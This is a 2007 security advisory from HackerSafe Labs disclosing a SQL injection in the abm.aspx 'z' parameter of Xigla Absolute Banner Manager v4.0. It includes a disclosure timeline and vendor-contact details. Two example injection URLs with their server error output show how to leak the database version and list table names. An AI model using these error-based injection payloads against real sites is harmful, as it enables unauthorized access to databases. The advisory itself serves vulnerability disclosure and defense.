xigla-sql.txt

`HackerSafe Labs - Security Advisory   
  
http://www.hackersafelabs.com/ <http://www.hackersafelabs.com/>   
  
Date: 12/06/2007  
Vendor: http://www.xigla.com <http://www.xigla.com>   
Package: Xigla Absolute Banner Manager   
Versions: v4.0   
Credit: Joseph Pierini - HackerSafe Labs  
  
Risk:   
Related Exploit Range: Remote   
Attack Complexity: Medium   
Level of Authentication Needed: Not Required   
Confidentiality Impact: Major   
Integrity Impact: Major   
Availability Impact: Major   
  
Overview:   
Absolute Banner Manager .NET is a feature packed Ad Tracking and Banner  
Management software specially developed for the webmaster looking for a  
scalable, flexible and reliable Banner Ad Serving front-end tool.   
  
Vulnerabilities:   
A SQL injection exists in the Windows version of the Xigla Absolute  
Banner Manager application.   
  
SQL Injection Page: "abm.aspx"   
SQL Injection Parameter: "z="   
  
Examples:   
  
http://www.domainname.com/absolutebm/abm.aspx?z=@@version  
<http://www.domainname.com/absolutebm/abm.aspx?z=@@version>   
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 -  
8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003  
Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790:  
Service Pack 1) ' to a column of data type int.   
http://www.domainname.com/absolutebm/abm.aspx?z=1))%20and%201=convert(in  
t,(select%20top%201%20%20convert(varchar,name)%20from%20sysobjects%20whe  
re%20xtype=char(85)))  
<http://www.domainname.com/absolutebm/abm.aspx?z=1))%20and%201=convert(i  
nt,(select%20top%201%20%20convert(varchar,name)%20from%20sysobjects%20wh  
ere%20xtype=char(85)))> -   
Syntax error converting the varchar value 'dtproperties' to a column of  
data type int.   
  
Resolution Timeline:   
  
Vendor Notification: October 29, 2007 : '[email protected]'  
'[email protected]'  
Vendor Response: None   
Vendor Fix: None   
Public release of advisory: December 6, 2007   
  
ScanAlert Responsible Disclosure Policy  
  
  
  
ScanAlert believes in the responsible disclosure of vulnerability  
information with a coordinated release with the vendor where possible.  
Except where active and/or trivial exploitation of the vulnerability is  
present, ScanAlert believes it is in the best interest of the community  
when the vendor participates in the process of disclosure and has  
sufficient time to respond effectively. If ScanAlert exhausts all  
reasonable means in order to contact a vendor, then ScanAlert may issue  
a public advisory disclosing its findings 15 business days after the  
initial contact.  
  
ScanAlert's mission is to make the web safe from hackers.   
  
We make web sites secure from hackers and certify it to their customers  
via   
our patent pending HACKER SAFE(r) security certification technology. Our  
daily   
security audits and real-time certification enables consumers to know   
whether the sites where they shop are taking the necessary steps to   
safeguard their personal information from hackers. By alleviating  
consumers'   
fears of identity theft and credit card fraud, online merchants who earn  
  
HACKER SAFE certification consistently see substantial increases in  
online   
transactions   
  
Joseph Pierini, CISSP | Director, Enterprise Services   
ScanAlert ( www.scanalert.com) <http://www.scanalert.com)>   
[email protected] <mailto:[email protected]>   
877-302-9965 ext 1185   
  
  
  
  
  
  
`